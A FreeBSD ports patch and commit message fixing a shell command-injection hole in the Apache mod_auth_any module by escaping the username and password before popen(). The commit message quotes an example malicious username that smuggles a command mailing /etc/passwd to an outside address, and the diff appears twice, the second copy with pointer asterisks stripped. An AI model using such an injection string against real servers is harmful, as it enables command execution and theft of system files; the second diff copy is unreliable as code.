freebsd-ports/www/mod_auth_any/files/patch-mod_auth_any.c

--- mod_auth_any.c.orig	Tue Jan  9 05:48:20 2001
+++ mod_auth_any.c	Tue Mar 25 01:09:55 2003
@@ -121,6 +121,7 @@
   
 */
 
+char* bash_single_quote_escape_string(const char *);
   
 /* NB: debugging stuff */
 extern int errno;
@@ -180,13 +181,25 @@
     const char *rpw, *w;
     FILE* ext_authprog;
     FILE* fp;
+    char *escaped_user, *escaped_password;
     
     l = (char*) malloc (MAX_STRING_LEN * sizeof(char));
+    memset (l, '\0', MAX_STRING_LEN);
     execstr = (char*) malloc (MAX_STRING_LEN * sizeof(char));
 
     setenv ("REMOTE_ADDR", r -> connection -> remote_ip, 1);
+
+    /* escape the user name and the password */
+    escaped_user = bash_single_quote_escape_string(user);
+    escaped_password = bash_single_quote_escape_string(password);
+
     /* open the program stream */
-    snprintf (execstr, MAX_STRING_LEN, "%s %s \"%s\"", auth_pwfile, user, password);
+    snprintf (execstr, MAX_STRING_LEN, "%s %s %s", auth_pwfile, escaped_user, escaped_password);
+
+    /* free the escaped user and password before we forget */
+    free(escaped_user);
+    free(escaped_password);
+
     if (!(ext_authprog = popen (execstr, "r"))) {
 
       ap_log_rerror (APLOG_MARK, APLOG_ERR, r, "Could not popen() on program: %s: %s",
o Fix vulnerability that allows execution of arbitrary commands on the server with the uid of the apache process. Background [1]: "The module accepts a username and password from the web client, passes them to a user-space executable (using popen(3), which invokes a shell) and waits for a response in order to authenticate the user. The password is quoted on the popen() command line to avoid interpretation of shell special chars, but the username is not. Thus a malicious user can execute commands by supplying an appropriately crafted username. (e.g. "foo&mail me@my.home</etc/passwd") "The problem is easily fixed by adding quotes (and escaping any quotes already present) to the username and password in the popen command line." o Fix this by adding a escaping function from [2]. Then, modifying this function appropriately with ideas from [3]. Apply the new escaping code to mod_auth_any. o Bump PORTREVISION Submitted by: Security Officer (nectar), Red Hat Security Response Team <security@redhat.com> [1] Obtained from: mod_auth_any CVS [2], nalin@redhat.com [3] 2003-03-25 05:23:11 +01:00			`--- mod_auth_any.c.orig Tue Jan 9 05:48:20 2001`
			`+++ mod_auth_any.c Tue Mar 25 01:09:55 2003`
			`@@ -121,6 +121,7 @@`

			`*/`

			`+char* bash_single_quote_escape_string(const char *);`

			`/* NB: debugging stuff */`
			`extern int errno;`
			`@@ -180,13 +181,25 @@`
			`const char rpw, w;`
			`FILE* ext_authprog;`
			`FILE* fp;`
			`+ char escaped_user, escaped_password;`

			`l = (char) malloc (MAX_STRING_LEN sizeof(char));`
			`+ memset (l, '\0', MAX_STRING_LEN);`
			`execstr = (char) malloc (MAX_STRING_LEN sizeof(char));`

			`setenv ("REMOTE_ADDR", r -> connection -> remote_ip, 1);`
			`+`
			`+ /* escape the user name and the password */`
			`+ escaped_user = bash_single_quote_escape_string(user);`
			`+ escaped_password = bash_single_quote_escape_string(password);`
			`+`
			`/* open the program stream */`
			`- snprintf (execstr, MAX_STRING_LEN, "%s %s \"%s\"", auth_pwfile, user, password);`
			`+ snprintf (execstr, MAX_STRING_LEN, "%s %s %s", auth_pwfile, escaped_user, escaped_password);`
			`+`
			`+ /* free the escaped user and password before we forget */`
			`+ free(escaped_user);`
			`+ free(escaped_password);`
			`+`
			`if (!(ext_authprog = popen (execstr, "r"))) {`

			`ap_log_rerror (APLOG_MARK, APLOG_ERR, r, "Could not popen() on program: %s: %s",`